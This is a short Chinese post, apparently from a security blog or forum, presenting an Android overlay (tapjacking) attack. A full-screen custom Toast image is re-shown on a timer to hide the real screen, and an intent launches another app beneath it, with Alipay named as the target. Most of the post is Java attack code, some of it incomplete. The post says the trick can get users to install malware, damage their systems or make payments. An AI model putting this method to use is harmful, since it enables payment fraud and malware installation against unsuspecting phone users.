漏洞？android的！

android有一个Toast类，可以自定义，并且可以阻挡用户视线，但是用户的操作直接作用于toast类所覆盖的界面，可以利用Toast类隐藏并引导用户执行恶意操作，比如恶意程序安装、恶意破坏用户系统、恶意支付（可以利用支付宝或财付通手机客户端进行恶意支付）等等。但是toast生命周期为3秒钟，所以toast必须定时执行，并且在3秒之间有一次闪烁，故中间的空隙可以通过毅一个过度activity代替。

具体实现很简单，Toast自定义为一张图片，引诱用户进行操作，方法如下：

Toast toast = new Toast(activity.this); ImageView view = new ImageView(activity.this); view.setImageResource(R.drawable.picture); //诱骗所使用的图片 toast.setView(view); toast.setDuration(Toast.LENGTH_LONG); toast.setGravity(Gravity.FILL_HORIZONTAL|Gravity.FILL_VERTICAL, 0, 0); toast.show(); //Toast定时执行通过如下函数实现： Timer mTimer = new Timer(); mTimer.schedule (new TimerTask() { public void run() { Looper.prepare(); //使用Toast进行诱导操作 Looper.loop(); } } 执行延迟时间,每次执行间隔);

如果希望劫持android的其它应用程序，可以在Toast界面之下通过intent启动一个其它应用程序，方法如下：

PackageInfo pi = getPackageManager().getPackageInfo(pName, 0);//pName为应用程序名字，支付宝为com.eg.android.AlipayGphone Intent resolveIntent = new Intent(Intent.ACTION_MAIN, null); resolveIntent.addCategory(Intent.CATEGORY_LAUNCHER); resolveIntent.setPackage(pi.packageName); PackageManager pm=getPackageManager (); List<ResolveInfo> apps = pm.queryIntentActivities(resolveIntent, 0); ResolveInfo ri = apps.iterator().next(); if (ri != null ) { String packageName = ri.activityInfo.packageName; String className = ri.activityInfo.name; Intent intent = new Intent(Intent.ACTION_MAIN); intent.addCategory(Intent.CATEGORY_LAUNCHER); ComponentName cn = new ComponentName(packageName, className); intent.setComponent(cn); startActivity(intent);

 

通过Toast对应用程序进行劫持，可以执行任何想做的操作。